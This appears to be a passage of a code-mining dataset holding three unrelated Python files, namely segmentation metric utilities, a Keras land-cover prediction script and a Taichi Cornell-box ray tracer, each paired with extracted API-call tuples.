] | [((21, 81), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/Users/tom/Dropbox/msc-ml/project/src/"""'], {}), "(0, '/Users/tom/Dropbox/msc-ml/project/src/')\n", (36, 81), False, 'import sys, json, math\n'), ((82, 157), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/cs/student/msc/ml/2017/thosking/dev/msc-project/src/"""'], {}), "(0, '/cs/student/msc/ml/2017/thosking/dev/msc-project/src/')\n", (97, 157), False, 'import sys, json, math\n'), ((158, 211), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/home/thosking/msc-project/src/"""'], {}), "(0, '/home/thosking/msc-project/src/')\n", (173, 211), False, 'import sys, json, math\n'), ((1569, 1869), 'instance.DiscriminatorInstance', 'DiscriminatorInstance', ([], {'path': "(FLAGS.model_dir + 'saved/qanet2/' if FLAGS.disc_init_qanet is True else None)", 'trainable': '(True)', 'log_slug': "(FLAGS.disc_modelslug + ('_SQUAD' if FLAGS.disc_trainonsquad else '') + (\n '_QAINIT' if FLAGS.disc_init_qanet else ''))", 'force_init': 'FLAGS.disc_init_qanet'}), "(path=FLAGS.model_dir + 'saved/qanet2/' if FLAGS.\n disc_init_qanet is True else None, trainable=True, log_slug=FLAGS.\n disc_modelslug + ('_SQUAD' if FLAGS.disc_trainonsquad else '') + (\n '_QAINIT' if FLAGS.disc_init_qanet else ''), force_init=FLAGS.\n disc_init_qanet)\n", (1590, 1869), False, 'from instance import DiscriminatorInstance\n'), ((1929, 1960), 'math.floor', 'math.floor', (['(0.8 * num_instances)'], {}), '(0.8 * num_instances)\n', (1939, 1960), False, 'import sys, json, math\n'), ((1977, 2008), 'math.floor', 'math.floor', (['(0.2 * num_instances)'], {}), '(0.2 * num_instances)\n', (1987, 2008), False, 'import sys, json, math\n'), ((5044, 5056), 'tensorflow.app.run', 'tf.app.run', ([], {}), '()\n', (5054, 5056), True, 'import tensorflow as tf\n'), ((1079, 1150), 'helpers.loader.load_squad_triples', 'loader.load_squad_triples', (['FLAGS.data_path', 'FLAGS.disc_dev_set'], {'v2': '(True)'}), '(FLAGS.data_path, FLAGS.disc_dev_set, v2=True)\n', (1104, 1150), True, 'import helpers.loader as loader\n'), ((702, 714), 'json.load', 'json.load', (['f'], {}), '(f)\n', (711, 714), False, 'import sys, json, math\n'), ((2524, 2562), 'numpy.random.shuffle', 'np.random.shuffle', (['positive_data_train'], {}), '(positive_data_train)\n', (2541, 2562), True, 'import numpy as np\n'), ((2575, 2613), 'numpy.random.shuffle', 'np.random.shuffle', (['negative_data_train'], {}), '(negative_data_train)\n', (2592, 2613), True, 'import numpy as np\n'), ((2637, 2681), 'numpy.random.binomial', 'np.random.binomial', (['(1)', '(0.5)', 'FLAGS.batch_size'], {}), '(1, 0.5, FLAGS.batch_size)\n', (2655, 2681), True, 'import numpy as np\n'), ((4797, 4813), 'numpy.mean', 'np.mean', (['dev_acc'], {}), '(dev_acc)\n', (4804, 4813), True, 'import numpy as np\n'), ((4830, 4846), 'numpy.mean', 'np.mean', (['dev_nll'], {}), '(dev_nll)\n', (4837, 4846), True, 'import numpy as np\n'), ((4892, 4908), 'numpy.mean', 'np.mean', (['dev_nll'], {}), '(dev_nll)\n', (4899, 4908), True, 'import numpy as np\n'), ((3675, 3719), 'numpy.random.binomial', 'np.random.binomial', (['(1)', '(0.5)', 'FLAGS.batch_size'], {}), '(1, 0.5, FLAGS.batch_size)\n', (3693, 3719), True, 'import numpy as np\n'), ((4214, 4228), 'numpy.round', 'np.round', (['pred'], {}), '(pred)\n', (4222, 4228), True, 'import numpy as np\n'), ((4464, 4480), 'numpy.mean', 'np.mean', (['dev_acc'], {}), '(dev_acc)\n', (4471, 4480), True, 'import numpy as np\n'), ((4615, 4631), 'numpy.mean', 'np.mean', (['dev_nll'], {}), '(dev_nll)\n', (4622, 4631), True, 'import numpy as np\n')] |
# coding:utf-8
import numpy as np
import torch
import math
import cv2
class IOUMetric(object):
"""
Class to calculate mean-iou using fast_hist method
"""
def __init__(self, num_classes):
self.num_classes = num_classes
self.hist = np.zeros((num_classes, num_classes))
def _fast_hist(self, label_pred, label_true):
mask = (label_true >= 0) & (label_true < self.num_classes)
hist = np.bincount(
self.num_classes * label_true[mask].astype(int) +
label_pred[mask], minlength=self.num_classes ** 2).reshape(self.num_classes, self.num_classes)
return hist
def add_batch(self, predictions, gts):
for lp, lt in zip(predictions, gts):
self.hist += self._fast_hist(lp.flatten(), lt.flatten())
def evaluate(self):
acc = np.diag(self.hist).sum() / self.hist.sum()
acc_cls = np.diag(self.hist) / self.hist.sum(axis=1)
acc_cls = np.nanmean(acc_cls)
iu = np.diag(self.hist) / (self.hist.sum(axis=1) + self.hist.sum(axis=0) - np.diag(self.hist))
mean_iu = np.nanmean(iu)
freq = self.hist.sum(axis=1) / self.hist.sum()
fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()
return acc, acc_cls, iu, mean_iu, fwavacc
def soft_thresholding(x, lm):
ze_ = torch.zeros(size=x.size(), device=x.device)
return torch.sign(x) * torch.maximum(torch.abs(x) - lm, ze_)
@torch.no_grad()
def fast_ista(b, A, lmbda, max_iter):
"""
This is the fast Iterative Shrinkage-Thresholding Algorithm to solve the following objective:
min: {L2_norm(Ax - b) + L1_norm(x)}
:param b: input data with shape: [n_samples, n_features]
:param A: a pre-learned Dictionary, with shape: [n_coeffs, n_features]
:param lmbda: sparsity term to control the importance of the L1 term
:param max_iter:
:return: sparse codes with shape: [n_samples, n_coeffs]
"""
n_coeffs, n_feats = A.size()
n_samples = b.size()[0]
x = torch.zeros(size=(n_samples, n_coeffs), device=b.device)
t = 1.
z = torch.zeros(size=(n_samples, n_coeffs), device=b.device)
L = torch.linalg.norm(A, ord=2) ** 2 # Lipschitz constant, 2-norm (largest sing. value)
for k in range(max_iter):
x_old = x.clone()
z = z + torch.matmul(b - torch.matmul(z, A), A.T) / L
x = soft_thresholding(z, lmbda / L)
t0 = t
t = (1. + math.sqrt(1. + 4. * t ** 2)) / 2.
z = x + ((t0 - 1.) / t) * (x - x_old)
return x
def tensor_to_dtm(masks, mask_size, kernel=5, dist_type=cv2.DIST_L2):
device = masks.device
masks = masks.view(masks.shape[0], mask_size, mask_size).cpu().numpy()
masks = masks.astype(np.uint8)
DTMs = []
for m in masks:
dist_m = cv2.distanceTransform(m, distanceType=dist_type, maskSize=kernel)
dist_m = dist_m / max(np.max(dist_m), 1.) # basic dtms in (0, 1)
dist_map = np.where(dist_m > 0, dist_m, -1).astype(np.float32) # DTM in (-1, 0-1)
DTMs.append(dist_map.reshape((1, -1)))
DTMs = np.concatenate(DTMs, axis=0)
DTMs = torch.from_numpy(DTMs).to(torch.float32).to(device)
return DTMs
def prepare_distance_transform_from_mask_with_weights(masks, mask_size, kernel=3, dist_type=cv2.DIST_L2, fg_weighting=1.0, bg_weighting=0.9, mask_bias=-0.1):
"""
Given a set of masks as torch tensor, convert to numpy array, find distance transform maps from them,
and convert DTMs back to torch tensor, a weight map with 1 - DTM will be returned(emphasizing boundary and thin parts)
:param mask_bias: bias set for the pixels outside the contour
:param fg_weighting: weighting for foreground pixels on the DTMs
:param bg_weighting: weighting for background pixels on the DTMs
:param dist_type: used for distance transform
:param kernel: kernel size for distance transforms
:param masks: input masks for instance segmentation, shape: (N, mask_size, mask_size)
:param mask_size: input mask size
:return: a set of distance transform maps, and a weight map in torch tensor, with the same shape as input masks
"""
assert mask_size * mask_size == masks.shape[1]
device = masks.device
masks = masks.view(masks.shape[0], mask_size, mask_size).cpu().numpy()
masks = masks.astype(np.uint8)
DTMs = []
weight_maps = []
HD_maps = []
for m in masks:
dist_m = cv2.distanceTransform(m, distanceType=dist_type, maskSize=kernel)
dist_peak = np.max(dist_m)
dist_m = dist_m / (dist_peak + 1e-6) # basic dtms in (0, 1)
weight_map = np.where(dist_m > 0, fg_weighting + bg_weighting - dist_m, bg_weighting).astype(np.float32)
dist_map = np.where(dist_m > 0, dist_m, -1).astype(np.float32) # DTM in (-1, 0-1)
hd_map = np.where(dist_m > 0, dist_m ** 2., mask_bias).astype(np.float32) # not sure why the best
weight_maps.append(weight_map.reshape((1, -1)))
DTMs.append(dist_map.reshape((1, -1)))
HD_maps.append(hd_map.reshape((1, -1)))
DTMs = np.concatenate(DTMs, axis=0)
weight_maps = np.concatenate(weight_maps, axis=0)
HD_maps = np.concatenate(HD_maps, axis=0)
DTMs = torch.from_numpy(DTMs).to(torch.float32).to(device)
weight_maps = torch.from_numpy(weight_maps).to(torch.float32).to(device)
HD_maps = torch.from_numpy(HD_maps).to(torch.float32).to(device)
return DTMs, weight_maps, HD_maps
| [
"torch.from_numpy",
"math.sqrt",
"torch.matmul",
"numpy.zeros",
"torch.sign",
"numpy.max",
"numpy.where",
"torch.linalg.norm",
"torch.zeros",
"numpy.diag",
"torch.no_grad",
"torch.abs",
"cv2.distanceTransform",
"numpy.concatenate",
"numpy.nanmean"
] | [((1428, 1443), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1441, 1443), False, 'import torch\n'), ((1995, 2051), 'torch.zeros', 'torch.zeros', ([], {'size': '(n_samples, n_coeffs)', 'device': 'b.device'}), '(size=(n_samples, n_coeffs), device=b.device)\n', (2006, 2051), False, 'import torch\n'), ((2071, 2127), 'torch.zeros', 'torch.zeros', ([], {'size': '(n_samples, n_coeffs)', 'device': 'b.device'}), '(size=(n_samples, n_coeffs), device=b.device)\n', (2082, 2127), False, 'import torch\n'), ((3061, 3089), 'numpy.concatenate', 'np.concatenate', (['DTMs'], {'axis': '(0)'}), '(DTMs, axis=0)\n', (3075, 3089), True, 'import numpy as np\n'), ((5050, 5078), 'numpy.concatenate', 'np.concatenate', (['DTMs'], {'axis': '(0)'}), '(DTMs, axis=0)\n', (5064, 5078), True, 'import numpy as np\n'), ((5097, 5132), 'numpy.concatenate', 'np.concatenate', (['weight_maps'], {'axis': '(0)'}), '(weight_maps, axis=0)\n', (5111, 5132), True, 'import numpy as np\n'), ((5147, 5178), 'numpy.concatenate', 'np.concatenate', (['HD_maps'], {'axis': '(0)'}), '(HD_maps, axis=0)\n', (5161, 5178), True, 'import numpy as np\n'), ((266, 302), 'numpy.zeros', 'np.zeros', (['(num_classes, num_classes)'], {}), '((num_classes, num_classes))\n', (274, 302), True, 'import numpy as np\n'), ((957, 976), 'numpy.nanmean', 'np.nanmean', (['acc_cls'], {}), '(acc_cls)\n', (967, 976), True, 'import numpy as np\n'), ((1098, 1112), 'numpy.nanmean', 'np.nanmean', (['iu'], {}), '(iu)\n', (1108, 1112), True, 'import numpy as np\n'), ((1371, 1384), 'torch.sign', 'torch.sign', (['x'], {}), '(x)\n', (1381, 1384), False, 'import torch\n'), ((2136, 2163), 'torch.linalg.norm', 'torch.linalg.norm', (['A'], {'ord': '(2)'}), '(A, ord=2)\n', (2153, 2163), False, 'import torch\n'), ((2771, 2836), 'cv2.distanceTransform', 'cv2.distanceTransform', (['m'], {'distanceType': 'dist_type', 'maskSize': 'kernel'}), '(m, distanceType=dist_type, maskSize=kernel)\n', (2792, 2836), False, 'import cv2\n'), ((4404, 4469), 'cv2.distanceTransform', 'cv2.distanceTransform', (['m'], {'distanceType': 'dist_type', 'maskSize': 'kernel'}), '(m, distanceType=dist_type, maskSize=kernel)\n', (4425, 4469), False, 'import cv2\n'), ((4490, 4504), 'numpy.max', 'np.max', (['dist_m'], {}), '(dist_m)\n', (4496, 4504), True, 'import numpy as np\n'), ((896, 914), 'numpy.diag', 'np.diag', (['self.hist'], {}), '(self.hist)\n', (903, 914), True, 'import numpy as np\n'), ((990, 1008), 'numpy.diag', 'np.diag', (['self.hist'], {}), '(self.hist)\n', (997, 1008), True, 'import numpy as np\n'), ((1060, 1078), 'numpy.diag', 'np.diag', (['self.hist'], {}), '(self.hist)\n', (1067, 1078), True, 'import numpy as np\n'), ((1401, 1413), 'torch.abs', 'torch.abs', (['x'], {}), '(x)\n', (1410, 1413), False, 'import torch\n'), ((2417, 2446), 'math.sqrt', 'math.sqrt', (['(1.0 + 4.0 * t ** 2)'], {}), '(1.0 + 4.0 * t ** 2)\n', (2426, 2446), False, 'import math\n'), ((2867, 2881), 'numpy.max', 'np.max', (['dist_m'], {}), '(dist_m)\n', (2873, 2881), True, 'import numpy as np\n'), ((2930, 2962), 'numpy.where', 'np.where', (['(dist_m > 0)', 'dist_m', '(-1)'], {}), '(dist_m > 0, dist_m, -1)\n', (2938, 2962), True, 'import numpy as np\n'), ((4596, 4668), 'numpy.where', 'np.where', (['(dist_m > 0)', '(fg_weighting + bg_weighting - dist_m)', 'bg_weighting'], {}), '(dist_m > 0, fg_weighting + bg_weighting - dist_m, bg_weighting)\n', (4604, 4668), True, 'import numpy as np\n'), ((4707, 4739), 'numpy.where', 'np.where', (['(dist_m > 0)', 'dist_m', '(-1)'], {}), '(dist_m > 0, dist_m, -1)\n', (4715, 4739), True, 'import numpy as np\n'), ((4796, 4842), 'numpy.where', 'np.where', (['(dist_m > 0)', '(dist_m ** 2.0)', 'mask_bias'], {}), '(dist_m > 0, dist_m ** 2.0, mask_bias)\n', (4804, 4842), True, 'import numpy as np\n'), ((835, 853), 'numpy.diag', 'np.diag', (['self.hist'], {}), '(self.hist)\n', (842, 853), True, 'import numpy as np\n'), ((3101, 3123), 'torch.from_numpy', 'torch.from_numpy', (['DTMs'], {}), '(DTMs)\n', (3117, 3123), False, 'import torch\n'), ((5190, 5212), 'torch.from_numpy', 'torch.from_numpy', (['DTMs'], {}), '(DTMs)\n', (5206, 5212), False, 'import torch\n'), ((5260, 5289), 'torch.from_numpy', 'torch.from_numpy', (['weight_maps'], {}), '(weight_maps)\n', (5276, 5289), False, 'import torch\n'), ((5333, 5358), 'torch.from_numpy', 'torch.from_numpy', (['HD_maps'], {}), '(HD_maps)\n', (5349, 5358), False, 'import torch\n'), ((2311, 2329), 'torch.matmul', 'torch.matmul', (['z', 'A'], {}), '(z, A)\n', (2323, 2329), False, 'import torch\n')] |
# -*- coding: utf-8 -*-
"""
@author: <NAME>, Dept. of Land Surveying and Geo-Informatics, The Hong Kong Polytechnic Univ.
Email: <EMAIL>
"""
import gdal
import numpy as np
import keras
import rscls
import glob
data = 'all'
pfile = 'model/p48all_1602772409.6505635.h5'
size = 48
#%%
im1_file = r'images/Guangzhou.tif'
#ims = glob.glob(r'D:\DL_prd_lcz\data\predicted\*.tif')
#for im1_file in ims:
if True:
print(im1_file)
#%%
bgx,bgy,imx,imy = 0,0,10980,10980
def setGeo2(geotransform,bgx,bgy,scale):
reset0 = geotransform[0]
reset1 = geotransform[1] * scale
reset3 = geotransform[3]
reset5 = geotransform[5] * scale
reset = (reset0,reset1,geotransform[2],
reset3,geotransform[4],reset5)
return reset
#%%
if True:
if True:
p = keras.models.load_model(pfile)
# load
im = gdal.Open(im1_file,gdal.GA_ReadOnly)
gt = np.uint8(np.zeros([imx,imy]))
prj = im.GetProjection()
geo = im.GetGeoTransform()
newgeo = setGeo2(geo,bgx,bgy,10)
im = im.ReadAsArray(bgx,bgy,imx,imy)
im = im.transpose(1,2,0)
im1x,im1y,im1z = im.shape
im = np.float32(im)
im = im/5000.0
c1 = rscls.rscls(im,gt,cls=17)
c1.padding(size)
im = c1.im
im2x,im2y,im2z = im.shape
# predict part
pre_all_1 = []
ensemble = 1
for i in range(ensemble):
pre_rows_1 = []
# uncomment below if snapshot ensemble activated
# model1.fit(x1_train,y1_train,batch_size=bsz1,epochs=2,verbose=vbs,shuffle=True)
for j in range(im1x//10):
if j%10==0:
print(j)
#print(j) uncomment to monitor predicing stages
sam_row = c1.all_sample_row_multi(j*10,10)
pre_row1 = np.argmax(p.predict(sam_row),axis=1)
pre_row1 = pre_row1.reshape(1,im1y//10)
pre_rows_1.append(pre_row1)
pre_all_1.append(np.array(pre_rows_1))
# nipy_spectral, jet
a = np.array(pre_all_1).reshape(im1x//10,im1y//10)
rscls.save_cmap(a, 'nipy_spectral', im1_file[:-4]+'_pre.png')
# save as geocode-tif
name = im1_file[:-4]+'_pre'
outdata = gdal.GetDriverByName('GTiff').Create(name+'.tif', im1y//10, im1x//10, 1, gdal.GDT_UInt16)
outdata.SetGeoTransform(newgeo)
outdata.SetProjection(prj)
outdata.GetRasterBand(1).WriteArray(a+1)
outdata.FlushCache() ##saves to disk!!
outdata = None | [
"keras.models.load_model",
"gdal.GetDriverByName",
"numpy.float32",
"numpy.zeros",
"gdal.Open",
"rscls.save_cmap",
"numpy.array",
"rscls.rscls"
] | [((2380, 2443), 'rscls.save_cmap', 'rscls.save_cmap', (['a', '"""nipy_spectral"""', "(im1_file[:-4] + '_pre.png')"], {}), "(a, 'nipy_spectral', im1_file[:-4] + '_pre.png')\n", (2395, 2443), False, 'import rscls\n'), ((851, 881), 'keras.models.load_model', 'keras.models.load_model', (['pfile'], {}), '(pfile)\n', (874, 881), False, 'import keras\n'), ((931, 968), 'gdal.Open', 'gdal.Open', (['im1_file', 'gdal.GA_ReadOnly'], {}), '(im1_file, gdal.GA_ReadOnly)\n', (940, 968), False, 'import gdal\n'), ((1282, 1296), 'numpy.float32', 'np.float32', (['im'], {}), '(im)\n', (1292, 1296), True, 'import numpy as np\n'), ((1354, 1381), 'rscls.rscls', 'rscls.rscls', (['im', 'gt'], {'cls': '(17)'}), '(im, gt, cls=17)\n', (1365, 1381), False, 'import rscls\n'), ((2329, 2348), 'numpy.array', 'np.array', (['pre_all_1'], {}), '(pre_all_1)\n', (2337, 2348), True, 'import numpy as np\n'), ((2519, 2548), 'gdal.GetDriverByName', 'gdal.GetDriverByName', (['"""GTiff"""'], {}), "('GTiff')\n", (2539, 2548), False, 'import gdal\n'), ((994, 1014), 'numpy.zeros', 'np.zeros', (['[imx, imy]'], {}), '([imx, imy])\n', (1002, 1014), True, 'import numpy as np\n'), ((2257, 2277), 'numpy.array', 'np.array', (['pre_rows_1'], {}), '(pre_rows_1)\n', (2265, 2277), True, 'import numpy as np\n')] |
import taichi as ti
import time
import math
import numpy as np
from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract
ti.init(arch=ti.gpu)
res = (800, 800)
color_buffer = ti.Vector(3, dt=ti.f32, shape=res)
max_ray_depth = 10
eps = 1e-4
inf = 1e10
fov = 1.0
camera_pos = ti.Vector([0.0, 0.6, 2.0])
lihgt_min_pos = ti.Vector([-0.2, 1.99, 0.3])
light_max_pos = ti.Vector([0.2, 1.99, 0.4])
light_color = ti.Vector([0.9, 0.85, 0.7])
mat_lambertian = 0
mat_metal = 1
mat_glass = 2
refr_idx = 2.4 # diamond!
# right near sphere
sp1_center = ti.Vector([0.35, 0.22, 1.14])
sp1_radius = 0.21
# left far sphere
sp2_center = ti.Vector([-0.28, 0.6, 0.6])
sp2_radius = 0.42
@ti.func
def intersect_light(pos, d):
intersect, tmin, _ = ray_aabb_intersection(lihgt_min_pos, light_max_pos,
pos, d)
if tmin < 0 or intersect == 0:
tmin = inf
return tmin
@ti.func
def schlick(cos, eta):
r0 = (1.0 - eta) / (1.0 + eta)
r0 = r0 * r0
return r0 + (1 - r0) * ((1.0 - cos)**5)
@ti.func
def out_dir(indir, n, mat):
u = ti.Vector([1.0, 0.0, 0.0])
if mat == mat_lambertian:
if abs(n[1]) < 1 - eps:
u = ti.normalized(ti.cross(n, ti.Vector([0.0, 1.0, 0.0])))
v = ti.cross(n, u)
phi = 2 * math.pi * ti.random()
ay = ti.sqrt(ti.random())
ax = ti.sqrt(1 - ay**2)
u = ax * (ti.cos(phi) * u + ti.sin(phi) * v) + ay * n
elif mat == mat_metal:
u = reflect(indir, n)
else:
# glass
cos = ti.dot(indir, n)
ni_over_nt = refr_idx
outn = n
if cos > 0.0:
outn = -n
cos = refr_idx * cos
else:
ni_over_nt = 1.0 / refr_idx
cos = -cos
has_refr, refr_dir = refract(indir, outn, ni_over_nt)
refl_prob = 1.0
if has_refr:
refl_prob = schlick(cos, refr_idx)
if ti.random() < refl_prob:
u = reflect(indir, n)
else:
u = refr_dir
return ti.normalized(u)
@ti.func
def next_hit(pos, d):
closest, normal = inf, ti.Vector.zero(ti.f32, 3)
c, mat = ti.Vector.zero(ti.f32, 3), mat_lambertian
# right near sphere
cur_dist, hit_pos = intersect_sphere(pos, d, sp1_center, sp1_radius)
if 0 < cur_dist < closest:
closest = cur_dist
normal = ti.normalized(hit_pos - sp1_center)
c, mat = ti.Vector([1.0, 1.0, 1.0]), mat_glass
# left far sphere
cur_dist, hit_pos = intersect_sphere(pos, d, sp2_center, sp2_radius)
if 0 < cur_dist < closest:
closest = cur_dist
normal = ti.normalized(hit_pos - sp2_center)
c, mat = ti.Vector([0.8, 0.5, 0.4]), mat_metal
# left
pnorm = ti.Vector([1.0, 0.0, 0.0])
cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([-1.0, 0.0, 0.0]),
pnorm)
if 0 < cur_dist < closest:
closest = cur_dist
normal = pnorm
c, mat = ti.Vector([1.0, 0.0, 0.0]), mat_lambertian
# right
pnorm = ti.Vector([-1.0, 0.0, 0.0])
cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([1.0, 0.0, 0.0]),
pnorm)
if 0 < cur_dist < closest:
closest = cur_dist
normal = pnorm
c, mat = ti.Vector([0.0, 1.0, 0.0]), mat_lambertian
# bottom
pnorm = ti.Vector([0.0, 1.0, 0.0])
cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([0.0, 0.0, 0.0]),
pnorm)
if 0 < cur_dist < closest:
closest = cur_dist
normal = pnorm
c, mat = ti.Vector([1.0, 1.0, 1.0]), mat_lambertian
# top
pnorm = ti.Vector([0.0, -1.0, 0.0])
cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([0.0, 2.0, 0.0]),
pnorm)
if 0 < cur_dist < closest:
closest = cur_dist
normal = pnorm
c, mat = ti.Vector([1.0, 1.0, 1.0]), mat_lambertian
# far
pnorm = ti.Vector([0.0, 0.0, 1.0])
cur_dist, _ = ray_plane_intersect(pos, d, ti.Vector([0.0, 0.0, 0.0]),
pnorm)
if 0 < cur_dist < closest:
closest = cur_dist
normal = pnorm
c, mat = ti.Vector([1.0, 1.0, 1.0]), mat_lambertian
return closest, normal, c, mat
@ti.kernel
def render():
for u, v in color_buffer:
aspect_ratio = res[0] / res[1]
pos = camera_pos
d = ti.Vector([
(2 * fov * (u + ti.random()) / res[1] - fov * aspect_ratio - 1e-5),
(2 * fov * (v + ti.random()) / res[1] - fov - 1e-5),
-1.0,
])
d = ti.normalized(d)
throughput = ti.Vector([1.0, 1.0, 1.0])
depth = 0
hit_light = 0.0
while depth < max_ray_depth:
closest, normal, c, mat = next_hit(pos, d)
depth += 1
dist_to_light = intersect_light(pos, d)
if dist_to_light < closest:
hit_light = 1.0
depth = max_ray_depth
throughput *= light_color
else:
if normal.norm_sqr() != 0:
hit_pos = pos + closest * d
d = out_dir(d, normal, mat)
pos = hit_pos + 1e-4 * d
throughput *= c
else:
depth = max_ray_depth
color_buffer[u, v] += throughput * hit_light
gui = ti.GUI('Cornell Box', res)
last_t = 0
for i in range(50000):
render()
interval = 10
if i % interval == 0 and i > 0:
print("{:.2f} samples/s".format(interval / (time.time() - last_t)))
last_t = time.time()
img = color_buffer.to_numpy(as_vector=True) * (1 / (i + 1))
img = img / img.mean() * 0.24
gui.set_image(np.sqrt(img))
gui.show()
| [
"taichi.Vector.zero",
"taichi.GUI",
"taichi.sin",
"taichi.cross",
"taichi.random",
"renderer_utils.reflect",
"time.time",
"taichi.dot",
"renderer_utils.refract",
"renderer_utils.ray_aabb_intersection",
"taichi.init",
"taichi.sqrt",
"taichi.cos",
"taichi.Vector",
"taichi.normalized",
"r... | [((170, 190), 'taichi.init', 'ti.init', ([], {'arch': 'ti.gpu'}), '(arch=ti.gpu)\n', (177, 190), True, 'import taichi as ti\n'), ((223, 257), 'taichi.Vector', 'ti.Vector', (['(3)'], {'dt': 'ti.f32', 'shape': 'res'}), '(3, dt=ti.f32, shape=res)\n', (232, 257), True, 'import taichi as ti\n'), ((323, 349), 'taichi.Vector', 'ti.Vector', (['[0.0, 0.6, 2.0]'], {}), '([0.0, 0.6, 2.0])\n', (332, 349), True, 'import taichi as ti\n'), ((366, 394), 'taichi.Vector', 'ti.Vector', (['[-0.2, 1.99, 0.3]'], {}), '([-0.2, 1.99, 0.3])\n', (375, 394), True, 'import taichi as ti\n'), ((411, 438), 'taichi.Vector', 'ti.Vector', (['[0.2, 1.99, 0.4]'], {}), '([0.2, 1.99, 0.4])\n', (420, 438), True, 'import taichi as ti\n'), ((453, 480), 'taichi.Vector', 'ti.Vector', (['[0.9, 0.85, 0.7]'], {}), '([0.9, 0.85, 0.7])\n', (462, 480), True, 'import taichi as ti\n'), ((589, 618), 'taichi.Vector', 'ti.Vector', (['[0.35, 0.22, 1.14]'], {}), '([0.35, 0.22, 1.14])\n', (598, 618), True, 'import taichi as ti\n'), ((668, 696), 'taichi.Vector', 'ti.Vector', (['[-0.28, 0.6, 0.6]'], {}), '([-0.28, 0.6, 0.6])\n', (677, 696), True, 'import taichi as ti\n'), ((5474, 5500), 'taichi.GUI', 'ti.GUI', (['"""Cornell Box"""', 'res'], {}), "('Cornell Box', res)\n", (5480, 5500), True, 'import taichi as ti\n'), ((780, 839), 'renderer_utils.ray_aabb_intersection', 'ray_aabb_intersection', (['lihgt_min_pos', 'light_max_pos', 'pos', 'd'], {}), '(lihgt_min_pos, light_max_pos, pos, d)\n', (801, 839), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((1134, 1160), 'taichi.Vector', 'ti.Vector', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (1143, 1160), True, 'import taichi as ti\n'), ((2078, 2094), 'taichi.normalized', 'ti.normalized', (['u'], {}), '(u)\n', (2091, 2094), True, 'import taichi as ti\n'), ((2285, 2333), 'renderer_utils.intersect_sphere', 'intersect_sphere', (['pos', 'd', 'sp1_center', 'sp1_radius'], {}), '(pos, d, sp1_center, sp1_radius)\n', (2301, 2333), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((2546, 2594), 'renderer_utils.intersect_sphere', 'intersect_sphere', (['pos', 'd', 'sp2_center', 'sp2_radius'], {}), '(pos, d, sp2_center, sp2_radius)\n', (2562, 2594), False, 'from renderer_utils import ray_aabb_intersection, intersect_sphere, ray_plane_intersect, reflect, refract\n'), ((2784, 2810), 'taichi.Vector', 'ti.Vector', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (2793, 2810), True, 'import taichi as ti\n'), ((3096, 3123), 'taichi.Vector', 'ti.Vector', (['[-1.0, 0.0, 0.0]'], {}), '([-1.0, 0.0, 0.0])\n', (3105, 3123), True, 'import taichi as ti\n'), ((3409, 3435), 'taichi.Vector', 'ti.Vector', (['[0.0, 1.0, 0.0]'], {}), '([0.0, 1.0, 0.0])\n', (3418, 3435), True, 'import taichi as ti\n'), ((3718, 3745), 'taichi.Vector', 'ti.Vector', (['[0.0, -1.0, 0.0]'], {}), '([0.0, -1.0, 0.0])\n', (3727, 3745), True, 'import taichi as ti\n'), ((4028, 4054), 'taichi.Vector', 'ti.Vector', (['[0.0, 0.0, 1.0]'], {}), '([0.0, 0.0, 1.0])\n', (4037, 4054), True, 'import taichi as ti\n'), ((1306, 1320), 'taichi.cross', 'ti.cross', (['n', 'u'], {}), '(n, u)\n', (1314, 1320), True, 'import taichi as ti\n'), ((1408, 1428), 'taichi.sqrt', 'ti.sqrt', (['(1 - ay ** 2)'], {}), '(1 - ay ** 2)\n', (1415, 1428), True, 'import taichi as ti\n'), ((2155, 2180), 'taichi.Vector.zero', 'ti.Vector.zero', (['ti.f32', '(3)'], {}), '(ti.f32, 3)\n', (2169, 2180), True, 'import taichi as ti\n'), ((2194, 2219), 'taichi.Vector.zero', 'ti.Vector.zero', (['ti.f32', '(3)'], {}), '(ti.f32, 3)\n', (2208, 2219), True, 'import taichi as ti\n'), ((2409, 2444), 'taichi.normalized', 'ti.normalized', (['(hit_pos - sp1_center)'], {}), '(hit_pos - sp1_center)\n', (2422, 2444), True, 'import taichi as ti\n'), ((2670, 2705), 'taichi.normalized', 'ti.normalized', (['(hit_pos - sp2_center)'], {}), '(hit_pos - sp2_center)\n', (2683, 2705), True, 'import taichi as ti\n'), ((2857, 2884), 'taichi.Vector', 'ti.Vector', (['[-1.0, 0.0, 0.0]'], {}), '([-1.0, 0.0, 0.0])\n', (2866, 2884), True, 'import taichi as ti\n'), ((3170, 3196), 'taichi.Vector', 'ti.Vector', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (3179, 3196), True, 'import taichi as ti\n'), ((3482, 3508), 'taichi.Vector', 'ti.Vector', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (3491, 3508), True, 'import taichi as ti\n'), ((3792, 3818), 'taichi.Vector', 'ti.Vector', (['[0.0, 2.0, 0.0]'], {}), '([0.0, 2.0, 0.0])\n', (3801, 3818), True, 'import taichi as ti\n'), ((4101, 4127), 'taichi.Vector', 'ti.Vector', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (4110, 4127), True, 'import taichi as ti\n'), ((4682, 4698), 'taichi.normalized', 'ti.normalized', (['d'], {}), '(d)\n', (4695, 4698), True, 'import taichi as ti\n'), ((4721, 4747), 'taichi.Vector', 'ti.Vector', (['[1.0, 1.0, 1.0]'], {}), '([1.0, 1.0, 1.0])\n', (4730, 4747), True, 'import taichi as ti\n'), ((5695, 5706), 'time.time', 'time.time', ([], {}), '()\n', (5704, 5706), False, 'import time\n'), ((1349, 1360), 'taichi.random', 'ti.random', ([], {}), 